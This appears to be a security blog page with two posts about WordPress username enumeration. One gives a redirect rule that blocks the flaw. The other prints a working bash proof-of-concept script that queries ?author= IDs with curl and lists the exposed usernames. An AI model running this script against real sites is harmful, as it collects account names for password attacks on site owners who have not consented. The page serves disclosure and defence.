Anant Shrivastava : Techno Enthusiast

protection wordpress username enumeration

hacking, howto, idea, Technical No Comments »

After my last post exploiting username enumeration i have looked deep and found a simple workaround to patch your blog for this vulnerability till wordpress has something to add to it.

I am right now using a wordpress plugin : Redirections
https://wordpress.org/extend/plugins/redirection/

Inside the plugin page which comes under : tools -> redirections

Add a new rule with following settings.

Source url : ^(.*)/?author=(.*)
target url : /
Reg Exp : Yes
Match : url only
Action : Redirect to url

and Add Redirection

all done… just try any url with ?author=no

now this url will be redirected back to your main page effectively nullifying the effect of user name enumeration.

WordPress User Enumeration PoC Shell Script

hacking, scripting 1 Comment »

Hi All,

We have recently seen WordPress User name enumeration Vulnerability disclosure here http://seclists.org/fulldisclosure/2011/May/493

Versions Effected are : 2.6, 3.1, 3.1.1, 3.1.3

Here i am enclosing a simple PoC which could be run on Bash Shell.
(Note : PoC on python is already available for those who are curious)

#!/bin/bash # WordPress User Enumeration PoC by Anant Shrivastava # Disclosure : http://seclists.org/fulldisclosure/2011/May/493 if [ $# -ne 1 ] then echo "Wordpress username enumeration PoC" echo "based on disclosure @ : http://seclists.org/fulldisclosure/2011/May/493 " echo $0 "URL of Website" else count=0 title=0 while [ $count -lt 10 ] do result=`curl -I -s --max-time 30 --max-filesize 1 $1?author=$count | grep -F 'Location:'` name=`echo $result | rev | cut -f2 -d"/" | rev` nm=`echo "$"$result` if [ "$nm" != "$" ] then if [ $title == 0 ] then echo "ID : UserName" title=1 fi echo -n $count " : " echo $name fi count=`expr $count + 1` done if [ $title == 0 ] then echo "Either this site is not vulnerable or is not using wordpress hosted" fi fi
Code could be download from here : wp_PoC_user_name_enum